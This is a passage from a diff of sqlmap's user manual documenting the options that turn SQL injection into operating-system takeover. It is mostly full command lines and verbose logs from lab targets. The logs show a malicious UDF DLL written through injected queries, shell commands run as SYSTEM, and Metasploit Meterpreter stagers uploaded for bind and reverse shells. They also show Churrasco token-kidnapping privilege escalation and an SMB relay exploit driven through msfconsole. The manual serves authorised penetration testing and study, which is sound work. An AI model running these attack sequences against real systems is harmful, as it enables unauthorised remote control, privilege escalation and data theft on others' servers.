+[hh:mm:03] [INFO] checking if xp_cmdshell extended procedure is available, wait..
+[hh:mm:09] [INFO] xp_cmdshell extended procedure is available
+do you want to retrieve the command standard output? [Y/n] 
+[hh:mm:11] [INFO] the SQL query provided returns 1 entries
+command standard output:
+---
+nt authority\network service
+---
+
+
+

+ +

It is also possible to simulate a real shell where you can type as many +arbitrary commands as you wish. The option is --os-shell and has +the same TAB completion and history functionalities implemented for +--sql-shell.

+ +

Example on a MySQL 5.0.67 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \
+  --os-shell -v 2
+
+[...]
+[hh:mm:36] [INFO] the back-end DBMS is MySQL
+web server operating system: Windows 2003 or 2008
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
+back-end DBMS: MySQL >= 5.0.0
+
+[hh:mm:36] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:36] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:36] [DEBUG] query: IFNULL(CAST(MID((VERSION()), 1, 6) AS CHAR(10000)), CHAR(32))
+[hh:mm:36] [INFO] retrieved: 5.0.67
+[hh:mm:37] [DEBUG] performed 49 queries in 1 seconds
+[hh:mm:37] [DEBUG] query: SELECT SLEEP(5)
+[hh:mm:42] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:42] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:42] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:42] [DEBUG] query: CREATE TABLE sqlmapfile(data text)
+[hh:mm:42] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION())
+[hh:mm:42] [DEBUG] query: SELECT IFNULL(CAST(MID(@@datadir, 1, 1) AS CHAR(10000)), CHAR(32))
+[hh:mm:42] [INFO] retrieved: C
+[hh:mm:42] [DEBUG] performed 14 queries in 0 seconds
+[hh:mm:42] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:42] [DEBUG] cleaning up the database management system
+[hh:mm:42] [DEBUG] removing support tables
+[hh:mm:42] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:42] [INFO] testing if current user is DBA
+[hh:mm:42] [DEBUG] query: SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=
+(SUBSTRING_INDEX(CURRENT_USER(), CHAR(64), 1)) LIMIT 0, 1)=CHAR(89)) THEN 1 ELSE 0 END)
+[hh:mm:42] [INFO] retrieved: 1
+[hh:mm:43] [DEBUG] performed 5 queries in 0 seconds
+[hh:mm:43] [INFO] checking if sys_exec UDF already exist
+[hh:mm:43] [DEBUG] query: SELECT (CASE WHEN ((SELECT name FROM mysql.func WHERE name=
+CHAR(115,121,115,95,101,120,101,99) LIMIT 0, 1)=CHAR(115,121,115,95,101,120,101,99)) 
+THEN 1 ELSE 0 END)
+[hh:mm:43] [INFO] retrieved: 0
+[hh:mm:43] [DEBUG] performed 14 queries in 0 seconds
+[hh:mm:43] [INFO] checking if sys_eval UDF already exist
+[hh:mm:43] [DEBUG] query: SELECT (CASE WHEN ((SELECT name FROM mysql.func WHERE name=
+CHAR(115,121,115,95,101,118,97,108) LIMIT 0, 1)=CHAR(115,121,115,95,101,118,97,108)) 
+THEN 1 ELSE 0 END)
+[hh:mm:43] [INFO] retrieved: 0
+[hh:mm:43] [DEBUG] performed 14 queries in 0 seconds
+[hh:mm:43] [DEBUG] going to upload the binary file with stacked query SQL injection technique
+[hh:mm:43] [DEBUG] creating a support table to write the hexadecimal encoded file to
+[hh:mm:43] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:43] [DEBUG] query: CREATE TABLE sqlmapfile(data longblob)
+[hh:mm:43] [DEBUG] encoding file to its hexadecimal string value
+[hh:mm:43] [DEBUG] forging SQL statements to write the hexadecimal encoded file to the 
+support table
+[hh:mm:43] [DEBUG] inserting the hexadecimal encoded file to the support table
+[hh:mm:43] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (0x4d5a90 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x000000 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0xffcbff [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x490068 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x1c5485 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x14cc63 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x207665 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x5c5379 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x0e5bc2 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x505357 [...])
+[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x000000 [...])
+[hh:mm:44] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x696372 [...])
+[hh:mm:44] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0xdd8400 [...])
+[hh:mm:44] [DEBUG] exporting the binary file content to file './libsqlmapudftxxgk.dll'
+[hh:mm:44] [DEBUG] query: SELECT data FROM sqlmapfile INTO DUMPFILE './libsqlmapudftxxgk.dll'
+[hh:mm:44] [DEBUG] cleaning up the database management system
+[hh:mm:44] [DEBUG] removing support tables
+[hh:mm:44] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:44] [INFO] creating sys_exec UDF from the binary UDF file
+[hh:mm:44] [DEBUG] query: DROP FUNCTION sys_exec
+[hh:mm:44] [DEBUG] query: CREATE FUNCTION sys_exec RETURNS int SONAME 'libsqlmapudftxxgk.dll'
+[hh:mm:44] [INFO] creating sys_eval UDF from the binary UDF file
+[hh:mm:44] [DEBUG] query: DROP FUNCTION sys_eval
+[hh:mm:44] [DEBUG] query: CREATE FUNCTION sys_eval RETURNS string SONAME 
+'libsqlmapudftxxgk.dll'
+[hh:mm:44] [DEBUG] creating a support table to write commands standard output to
+[hh:mm:44] [DEBUG] query: DROP TABLE sqlmapoutput
+[hh:mm:44] [DEBUG] query: CREATE TABLE sqlmapoutput(data longtext)
+[hh:mm:44] [INFO] going to use injected sys_eval and sys_exec user-defined functions for 
+operating system command execution
+[hh:mm:44] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
+os-shell> whoami
+do you want to retrieve the command standard output? [Y/n] 
+[hh:mm:41] [DEBUG] query: INSERT INTO sqlmapoutput(data) VALUES (sys_eval('whoami'))
+[hh:mm:41] [DEBUG] query: SELECT IFNULL(CAST(data AS CHAR(10000)), CHAR(32)) FROM 
+sqlmapoutput
+[hh:mm:41] [INFO] retrieved: nt authority\system
+[hh:mm:44] [DEBUG] performed 140 queries in 2 seconds
+[hh:mm:44] [DEBUG] query: DELETE FROM sqlmapoutput
+command standard output:    'nt authority\system'
+
+os-shell> [TAB TAB]
+copy         del          dir          echo         md           mem          move         
+net          netstat -na  ver          whoami       xcopy        
+
+os-shell> exit
+[hh:mm:51] [INFO] cleaning up the database management system
+[hh:mm:51] [DEBUG] removing support tables
+[hh:mm:51] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:51] [DEBUG] query: DROP TABLE sqlmapoutput
+do you want to remove sys_exec UDF? [Y/n] n
+do you want to remove sys_eval UDF? [Y/n] n
+[hh:mm:04] [INFO] database management system cleanup finished
+[hh:mm:04] [WARNING] remember that UDF dynamic-link library files saved on the file system 
+can only be deleted manually
+
+
+

+ +

Now run it again, but specifying the --union-use to retrieve the +command standard output quicker, via UNION based SQL injection, when the +parameter is affected also by inband SQL injection vulnerability:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \
+  --os-shell -v 2 --union-use
+
+[...]
+[hh:mm:16] [INFO] the back-end DBMS is MySQL
+web server operating system: Windows 2003 or 2008
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
+back-end DBMS: MySQL >= 5.0.0
+
+[hh:mm:16] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
+technique
+[hh:mm:16] [INFO] confirming full inband sql injection on parameter 'id'
+[hh:mm:16] [INFO] the target url is affected by an exploitable full inband sql injection 
+vulnerability
+valid union:    'http://192.168.1.121:80/sqlmap/mysql/iis/get_int.aspx?id=1 UNION ALL SELECT 
+NULL, NULL, NULL# AND 528=528'
+
+[hh:mm:16] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:16] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:16] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),
+MID((VERSION()), 1, 6),CHAR(117,114,115,75,117,102)), NULL# AND 3173=3173
+[hh:mm:16] [DEBUG] performed 1 queries in 0 seconds
+[hh:mm:16] [DEBUG] query: SELECT SLEEP(5)
+[hh:mm:21] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:21] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:21] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:21] [DEBUG] query: CREATE TABLE sqlmapfile(data text)
+[hh:mm:21] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION())
+[hh:mm:21] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),
+MID(@@datadir, 1, 1),CHAR(117,114,115,75,117,102)), NULL# AND 6574=6574
+[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds
+[hh:mm:21] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:21] [DEBUG] cleaning up the database management system
+[hh:mm:21] [DEBUG] removing support tables
+[hh:mm:21] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:21] [INFO] testing if current user is DBA
+[hh:mm:21] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE 
+WHEN ((SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), CHAR(64), 
+1)) LIMIT 0, 1)=CHAR(89)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# AND 19=19
+[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds
+[hh:mm:21] [INFO] checking if sys_exec UDF already exist
+[hh:mm:21] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE WHEN 
+((SELECT name FROM mysql.func WHERE name=CHAR(115,121,115,95,101,120,101,99) LIMIT 0, 1)=
+CHAR(115,121,115,95,101,120,101,99)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# 
+AND 4900=4900
+[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds
+sys_exec UDF already exists, do you want to overwrite it? [y/N] n
+[hh:mm:24] [INFO] checking if sys_eval UDF already exist
+[hh:mm:24] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE WHEN 
+((SELECT name FROM mysql.func WHERE name=CHAR(115,121,115,95,101,118,97,108) LIMIT 0, 1)=
+CHAR(115,121,115,95,101,118,97,108)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# 
+AND 4437=4437
+[hh:mm:24] [DEBUG] performed 1 queries in 0 seconds
+sys_eval UDF already exists, do you want to overwrite it? [y/N] n
+[hh:mm:25] [DEBUG] keeping existing sys_exec UDF as requested
+[hh:mm:25] [DEBUG] keeping existing sys_eval UDF as requested
+[hh:mm:25] [DEBUG] creating a support table to write commands standard output to
+[hh:mm:25] [DEBUG] query: DROP TABLE sqlmapoutput
+[hh:mm:25] [DEBUG] query: CREATE TABLE sqlmapoutput(data longtext)
+[hh:mm:25] [INFO] going to use injected sys_eval and sys_exec user-defined functions for 
+operating system command execution
+[hh:mm:25] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
+os-shell> ipconfig
+do you want to retrieve the command standard output? [Y/n] 
+[hh:mm:29] [DEBUG] query: INSERT INTO sqlmapoutput(data) VALUES (sys_eval('ipconfig'))
+[hh:mm:29] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),IFNULL(CAST
+(data AS CHAR(10000)), CHAR(32)),CHAR(117,114,115,75,117,102)), NULL FROM sqlmapoutput# AND 
+7106=7106
+[hh:mm:29] [DEBUG] performed 1 queries in 0 seconds
+[hh:mm:29] [DEBUG] query: DELETE FROM sqlmapoutput
+command standard output:
+---
+
+Windows IP Configuration
+
+
+Ethernet adapter Local Area Connection 2:
+
+   Connection-specific DNS Suffix  . : localdomain
+   IP Address. . . . . . . . . . . . : 192.168.1.121
+   Subnet Mask . . . . . . . . . . . : 255.255.255.0
+---Default Gateway . . . . . . . . . : 192.168.1.1
+
+os-shell> exit
+[hh:mm:41] [INFO] cleaning up the database management system
+[hh:mm:41] [DEBUG] removing support tables
+[hh:mm:41] [DEBUG] query: DROP TABLE sqlmapfile
+[hh:mm:41] [DEBUG] query: DROP TABLE sqlmapoutput
+do you want to remove sys_exec UDF? [Y/n] n
+do you want to remove sys_eval UDF? [Y/n] n
+[hh:mm:54] [INFO] database management system cleanup finished
+[hh:mm:54] [WARNING] remember that UDF dynamic-link library files saved on the file system 
+can only be deleted manually
+
+
+

+ +

As you can see from this second example, sqlmap firstly check if the two +user-defined functions are already created, if so, it asks the user if he +wants to recreate them or keep them and save time.

Prompt for an out-of-band shell, meterpreter or VNC

Options: --os-pwn, --priv-esc, --msf-path and --tmp-path

-

TODO

+

It is possible to establish an out-of-band TCP stateful channel +between the attacker and the underlying operating system by using the +exploited SQL injection as a stepping stone. This is implemented for MySQL, +PostgreSQL and Microsoft SQL Server. +sqlmap relies on the +Metasploit to perform this attack, so you need to have it already +on your system: it's free and can be downloaded from the homepage. It is +advised to use Metasploit 3.3 development version from the subversion +repository.

-

The techniques implemented are detailed on the white paper +

Note that this feature is not supported by sqlmap running on Windows +because Metasploit's msfconsole and msfcli are not supported on the native +Windows Ruby interpreter.

+ +

These techniques are detailed on the white paper Advanced SQL injection to operating system full control.

+

Example on a MySQL 5.0.67 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \
+  --os-pwn -v 1 --msf-path /home/inquis/software/metasploit
+
+[...]
+[hh:mm:17] [INFO] the back-end DBMS is MySQL
+web server operating system: Windows 2003 or 2008
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
+back-end DBMS: MySQL >= 5.0.0
+
+[hh:mm:17] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:17] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:17] [INFO] retrieved: 5.0.67
+[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:23] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:23] [INFO] retrieved: C
+[hh:mm:23] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:23] [INFO] testing if current user is DBA
+[hh:mm:23] [INFO] retrieved: 1
+[hh:mm:23] [INFO] checking if sys_exec UDF already exist
+[hh:mm:23] [INFO] retrieved: 1
+[hh:mm:24] [INFO] sys_exec UDF already exists, do you want to overwrite it? [y/N] N
+[hh:mm:24] [INFO] checking if sys_eval UDF already exist
+[hh:mm:24] [INFO] retrieved: 1
+[hh:mm:24] [INFO] sys_eval UDF already exists, do you want to overwrite it? [y/N] N
+[hh:mm:24] [INFO] creating Metasploit Framework 3 payload stager
+[hh:mm:24] [INFO] which connection type do you want to use?
+[1] Bind TCP (default)
+[2] Bind TCP (No NX)
+[3] Reverse TCP
+[4] Reverse TCP (No NX)
+> 1
+[hh:mm:24] [INFO] which is the back-end DBMS address? [192.168.1.121] 192.168.1.121
+[hh:mm:24] [INFO] which remote port numer do you want to use? [61588] 61588
+[hh:mm:24] [INFO] which payload do you want to use?
+[1] Reflective Meterpreter (default)
+[2] PatchUp Meterpreter (only from Metasploit development revision 6742)
+[3] Shell
+[4] Reflective VNC
+[5] PatchUp VNC (only from Metasploit development revision 6742)
+> 1
+[hh:mm:24] [INFO] which payload encoding do you want to use?
+[1] No Encoder
+[2] Alpha2 Alphanumeric Mixedcase Encoder
+[3] Alpha2 Alphanumeric Uppercase Encoder
+[4] Avoid UTF8/tolower
+[5] Call+4 Dword XOR Encoder
+[6] Single-byte XOR Countdown Encoder
+[7] Variable-length Fnstenv/mov Dword XOR Encoder
+[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
+[9] Non-Alpha Encoder
+[10] Non-Upper Encoder
+[11] Polymorphic XOR Additive Feedback Encoder (default)
+[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
+[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
+> 11
+[hh:mm:24] [INFO] creation in progress .................. done
+[hh:mm:42] [INFO] compression in progress . quit unexpectedly with return code 1
+[hh:mm:43] [INFO] failed to compress the file because you provided a Metasploit version 
+above 3.3-dev revision 6681. This will not inficiate the correct execution of sqlmap. 
+It might only slow down a bit the execution of sqlmap
+[hh:mm:43] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/sqlmapmsfgcpge.exe'
+[hh:mm:44] [INFO] running Metasploit Framework 3 command line interface locally, wait..
+[hh:mm:44] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
+[*] Please wait while we load the module tree...
+[*] Started bind handler
+[*] Starting the payload handler...
+[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
+[*] Sending stage (718336 bytes)
+[*] Meterpreter session 1 opened (192.168.1.161:47832 -> 192.168.1.121:61588)
+
+meterpreter > Loading extension priv...success.
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > ipconfig
+
+MS TCP Loopback interface
+Hardware MAC: 00:00:00:00:00:00
+IP Address  : 127.0.0.1
+Netmask     : 255.0.0.0
+
+
+
+VMware Accelerated AMD PCNet Adapter
+Hardware MAC: 00:0c:29:29:ee:86
+IP Address  : 192.168.1.121
+Netmask     : 255.255.255.0
+
+
+meterpreter > pwd
+C:\Program Files\MySQL\MySQL Server 5.0\Data
+meterpreter > exit
+
+
+

+ +

By default MySQL on Windows runs as SYSTEM, however PostgreSQL +run as a low-privileged user postgres on both Windows and Linux. +Microsoft SQL Server 2000 by default runs as SYSTEM, whereas +Microsoft SQL Server 2005 and 2008 run most of the times as NETWORK +SERVICE and sometimes as LOCAL SERVICE.

+

It is possible to provide sqlmap with the --priv-esc option to +abuse Windows access tokens and escalate privileges to SYSTEM +within the Meterpreter session created if the underlying operating system +is not patched against Microsoft Security Bulletin +MS09-012. +sqlmap performs the +Windows Token kidnapping +technique by uploading +Churrasco +local exploit and using it to call the Metasploit's payload stager +executable. sqlmap uses also the Metasploit's Meterpreter +incognito +extension to abused Windows access tokens in conjunction to Churrasco +stand-alone exploit if the user wants so.

+ +

Note that this feature is not supported by sqlmap installed from the +DEB package because it relies on Churrasco, which is not explicitly free +software so it has not been included in the package.

+ +

This technique is detailed on the white paper +Advanced SQL injection to operating system full control.

+ +

Example on a Microsoft SQL Server 2005 Service Pack 0 running as +NETWORK SERVICE on the target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+  --os-pwn -v 1 --msf-path /home/inquis/software/metasploit --priv-esc
+
+[...]
+[hh:mm:17] [INFO] the back-end DBMS is Microsoft SQL Server
+web server operating system: Windows 2000
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP
+back-end DBMS: Microsoft SQL Server 2005
+
+[hh:mm:17] [INFO] testing stacked queries support on parameter 'name'
+[hh:mm:22] [INFO] the web application supports stacked queries on parameter 'name'
+[hh:mm:22] [INFO] testing if current user is DBA
+[hh:mm:22] [INFO] retrieved: 1
+[hh:mm:23] [INFO] checking if xp_cmdshell extended procedure is available, wait..
+[hh:mm:29] [INFO] xp_cmdshell extended procedure is available
+[hh:mm:29] [INFO] creating Metasploit Framework 3 payload stager
+which connection type do you want to use?
+[1] Bind TCP (default)
+[2] Bind TCP (No NX)
+[3] Reverse TCP
+[4] Reverse TCP (No NX)
+> 3
+which is the local address? [192.168.1.161] 
+which local port numer do you want to use? [61499] 
+[hh:mm:54] [INFO] forcing Metasploit payload to Meterpreter because it is the only payload 
+that can be used to abuse Windows Impersonation Tokens via Meterpreter 'incognito' 
+extension to privilege escalate
+which payload encoding do you want to use?
+[1] No Encoder
+[2] Alpha2 Alphanumeric Mixedcase Encoder
+[3] Alpha2 Alphanumeric Uppercase Encoder
+[4] Avoid UTF8/tolower
+[5] Call+4 Dword XOR Encoder
+[6] Single-byte XOR Countdown Encoder
+[7] Variable-length Fnstenv/mov Dword XOR Encoder
+[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
+[9] Non-Alpha Encoder
+[10] Non-Upper Encoder
+[11] Polymorphic XOR Additive Feedback Encoder (default)
+[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
+[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
+> 
+[hh:mm:58] [INFO] creation in progress .................. done
+[hh:mm:16] [INFO] compression in progress . quit unexpectedly with return code 1
+[hh:mm:17] [INFO] failed to compress the file because you provided a Metasploit version 
+above 3.3-dev revision 6681. This will not inficiate the correct execution of sqlmap. 
+It might only slow down a bit the execution of sqlmap
+[hh:mm:17] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/sqlmapmsfyahls.exe'
+[hh:mm:20] [WARNING] often Microsoft SQL Server 2005 runs as Network Service which has no 
+Windows Impersonation Tokens within all threads, this makes Meterpreter's incognito 
+extension to fail to list tokens
+do you want sqlmap to upload Churrasco and call the Metasploit payload stager as its 
+argument so that it will be started as SYSTEM? [Y/n] y
+[hh:mm:36] [INFO] the binary file is bigger than 65280 bytes. sqlmap will split it into 
+chunks, upload them and recreate the original file out of the binary chunks server-side, 
+wait..
+[hh:mm:22] [INFO] file chunk 1 written
+[14:10:06] [INFO] file chunk 2 written
+[14:10:06] [INFO] running Metasploit Framework 3 command line interface locally, wait..
+[*] Please wait while we load the module tree...
+[*] Handler binding to LHOST 0.0.0.0
+[*] Started reverse handler
+[*] Starting the payload handler...
+[14:10:31] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
+[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
+[*] Sending stage (718336 bytes)
+[*] Meterpreter session 1 opened (192.168.1.161:61499 -> 192.168.1.131:3221)
+
+meterpreter > 
+[14:11:01] [INFO] loading Meterpreter 'incognito' extension and displaying the list of 
+Access Tokens availables. Choose which user you want to impersonate by using incognito's 
+command 'impersonate_token'
+Loading extension priv...success.
+meterpreter > Loading extension incognito...success.
+meterpreter > Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+Delegation Tokens Available
+========================================
+NT AUTHORITY\LOCAL SERVICE
+NT AUTHORITY\NETWORK SERVICE
+NT AUTHORITY\SYSTEM
+W2K3DEV\Administrator
+W2K3DEV\IUSR_WIN2003
+W2K3DEV\postgres
+
+Impersonation Tokens Available
+========================================
+NT AUTHORITY\ANONYMOUS LOGON
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > exit
+
+
+

+

One click prompt for an out-of-band shell, meterpreter or VNC

Options: --os-smbrelay, --priv-esc and --msf-path

-

TODO

+

If the back-end database management system runs as Administrator +and the underlying operating system is not patched against Microsoft +Security Bulletin +MS08-068, +sqlmap can abuse the universal naming convention (UNC) supported within +all database management systems to force the database server to initiate a +SMB connection with the attacker host, then perform a SMB authentication +relay attack in order to establish a high-privileged out-of-band TCP +stateful channel between the attacker host and the target database +server. +sqlmap relies on +Metasploit's SMB relay exploit to perform this attack, so you need +to have it already on your system: it's free and can be downloaded from the +homepage. +You need to run sqlmap as root user if you want to perform a SMB +relay attack because it will need to listen on a user-specified SMB TCP +port for incoming connection attempts.

-

The techniques implemented are detailed on the white paper +

Note that this feature is not supported by sqlmap running on Windows +because Metasploit's msfconsole and msfcli are not supported on the native +Windows Ruby interpreter.

+ +

This technique is detailed on the white paper Advanced SQL injection to operating system full control.

+

Example on a Microsoft SQL Server 2005 Service Pack 0 running as +Administrator on the target:

+

+

+
+$ sudo python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+  --os-smbrelay -v 1 --msf-path /home/inquis/software/metasploit
+
+[...]
+[hh:mm:11] [INFO] the back-end DBMS is Microsoft SQL Server
+web server operating system: Windows 2000
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP
+back-end DBMS: Microsoft SQL Server 2005
+
+[hh:mm:11] [INFO] testing stacked queries support on parameter 'name'
+[hh:mm:16] [INFO] the web application supports stacked queries on parameter 'name'
+[hh:mm:16] [WARNING] it is unlikely that this attack will be successful because often 
+Microsoft SQL Server 2005 runs as Network Service which is not a real user, it does not 
+send the NTLM session hash when connecting to a SMB service
+[hh:mm:16] [INFO] which connection type do you want to use?
+[1] Bind TCP (default)
+[2] Bind TCP (No NX)
+[3] Reverse TCP
+[4] Reverse TCP (No NX)
+> 1
+[hh:mm:16] [INFO] which is the local address? [192.168.1.161] 192.168.1.161
+[hh:mm:16] [INFO] which is the back-end DBMS address? [192.168.1.131] 192.168.1.131
+[hh:mm:16] [INFO] which remote port numer do you want to use? [4907] 4907
+[hh:mm:16] [INFO] which payload do you want to use?
+[1] Reflective Meterpreter (default)
+[2] PatchUp Meterpreter (only from Metasploit development revision 6742)
+[3] Shell
+[4] Reflective VNC
+[5] PatchUp VNC (only from Metasploit development revision 6742)
+> 1
+[hh:mm:16] [INFO] which SMB port do you want to use?
+[1] 139/TCP (default)
+[2] 445/TCP
+> 1
+[hh:mm:16] [INFO] running Metasploit Framework 3 console locally, wait..
+
+                _                  _       _ _
+               | |                | |     (_) |
+ _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
+| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
+| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
+|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
+                            | |
+                            |_|
+
+
+       =[ msf v3.3-dev
++ -- --=[ 392 exploits - 234 payloads
++ -- --=[ 20 encoders - 7 nops
+       =[ 168 aux
+
+resource> use windows/smb/smb_relay
+resource> set SRVHOST 192.168.1.161
+SRVHOST => 192.168.1.161
+resource> set SRVPORT 139
+SRVPORT => 139
+resource> set PAYLOAD windows/meterpreter/bind_tcp
+PAYLOAD => windows/meterpreter/bind_tcp
+resource> set LPORT 4907
+LPORT => 4907
+resource> set RHOST 192.168.1.131
+RHOST => 192.168.1.131
+resource> exploit
+[*] Exploit running as background job.
+msf exploit(smb_relay) > 
+[*] Started bind handler
+[*] Server started.
+[*] Received 192.168.1.131:3242 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
+Service Pack 2 LM:
+[*] Sending Access Denied to 192.168.1.131:3242 \
+[*] Received 192.168.1.131:3242 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
+Server 2003 3790 Service Pack 2 LM:
+[*] Authenticating to 192.168.1.131 as W2K3DEV\Administrator...
+[*] AUTHENTICATED as W2K3DEV\Administrator...
+[*] Connecting to the ADMIN$ share...
+[*] Regenerating the payload...
+[*] Uploading payload...
+[*] Created \wELRmcmd.exe...
+[*] Connecting to the Service Control Manager...
+[*] Obtaining a service manager handle...
+[*] Creating a new service...
+[*] Closing service handle...
+[*] Opening service...
+[*] Starting the service...
+[*] Removing the service...
+[*] Closing service handle...
+[*] Deleting \wELRmcmd.exe...
+[*] Sending Access Denied to 192.168.1.131:3242 W2K3DEV\Administrator
+[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
+[*] Received 192.168.1.131:3244 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 
+Service Pack 2 LM:
+[*] Sending Access Denied to 192.168.1.131:3244 \
+[*] Received 192.168.1.131:3244 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows 
+Server 2003 3790 Service Pack 2 LM:
+[*] Authenticating to 192.168.1.131 as W2K3DEV\Administrator...
+[*] AUTHENTICATED as W2K3DEV\Administrator...
+[*] Ignoring request from 192.168.1.131, attack already in progress.
+[*] Sending Access Denied to 192.168.1.131:3244 W2K3DEV\Administrator
+[*] Sending stage (718336 bytes)
+[*] Meterpreter session 1 opened (192.168.1.161:51813 -> 192.168.1.131:4907)
+
+Active sessions
+===============
+
+  Id  Description  Tunnel                                       
+  --  -----------  ------                                       
+  1   Meterpreter  192.168.1.161:51813 -> 192.168.1.131:4907  
+
+msf exploit(smb_relay) > [*] Starting interaction with 1...
+
+meterpreter > [-] The 'priv' extension has already been loaded.
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > exit
+
+[*] Meterpreter session 1 closed.
+msf exploit(smb_relay) > exit
+
+[*] Server stopped.
+
+
+

+

Stored procedure buffer overflow exploitation

Options: --os-bof, --priv-esc and --msf-path

-

TODO

+

If the back-end database management system is not patched against Microsoft +Security Bulletin +MS09-004, +sqlmap can exploit the heap-based buffer overflow affecting +sp_replwritetovarbin stored procedure in order to establish an +out-of-band TCP stateful channel between the attacker host and the +target database server. +sqlmap has its own exploit to trigger the vulnerability, but it relies on +Metasploit to +generate the shellcode used within the exploit, so you need to have it +already on your system: it's free and can be downloaded from the homepage.

-

The techniques implemented are detailed on the white paper +

Note that this feature is not supported by sqlmap running on Windows +because Metasploit's msfconsole and msfcli are not supported on the native +Windows Ruby interpreter.

+ +

